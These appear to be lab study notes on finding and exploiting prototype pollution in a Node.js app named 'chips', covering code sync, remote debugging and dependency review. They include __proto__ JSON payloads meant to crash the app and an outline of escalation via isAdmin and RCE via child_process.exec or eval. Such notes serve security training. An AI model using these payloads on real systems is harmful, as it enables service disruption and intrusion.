Preparations
Code Sync
rsync -az --compress-level=1 student@chips:/home/student/chips/ chips/
Directory Structure
tree -L 3 /chips
Analysis
Files in Source Code
- Dockerfile, docker-compose.yml
- package.json
- routes/
- ./bin/www Observations
- How is the application started? (./bin/www)
- Requirements (
var app = require('../app');) - Environment Variables (
t_engine = process.env.TEMPLATING_ENGINE;) - Understand the layout of the application (docker-compose.yml)
Remote Debugging
.vscode/launch.jsondocker-compose -f ~/chips/docker-compose.yml exec chips node --inspect=0.0.0.0:9228
Prototype Pollution
Black Box
{"__proto__":{"toString": "abc"}} // crash application
{"__proto__":{"hasOwnProperty": "abc"}}
White Box - Proof of Concept
- View source code of application (typically not found there)
- View 1st and 2nd level dependencies
- Look for package with:
Merge, Extend, Clone, Set, Deep, Copy, Assign, Recursive - NPM List:
docker-compose -f ~/chips/docker-compose.yml run chips npm list -prod -depth 1 - NPM Audit:
docker-compose -f ~/chips/docker-compose.yml run chips npm audit
- Look for package with:
- If package is vulnerable, search application:
const DeepExtend = require('deep-extend');- Locate user-supplied data (otherwise not exploitable, move on)
White Box - Exploitation
isAdminvalue for privilege escalationchild_process.exec, eval or vm.runInNewContextvalue for RCE- Find dependencies to exploit:
- NPM List:
docker-compose -f ~/chips/docker-compose.yml run chips npm list -prod -depth 0
- NPM List: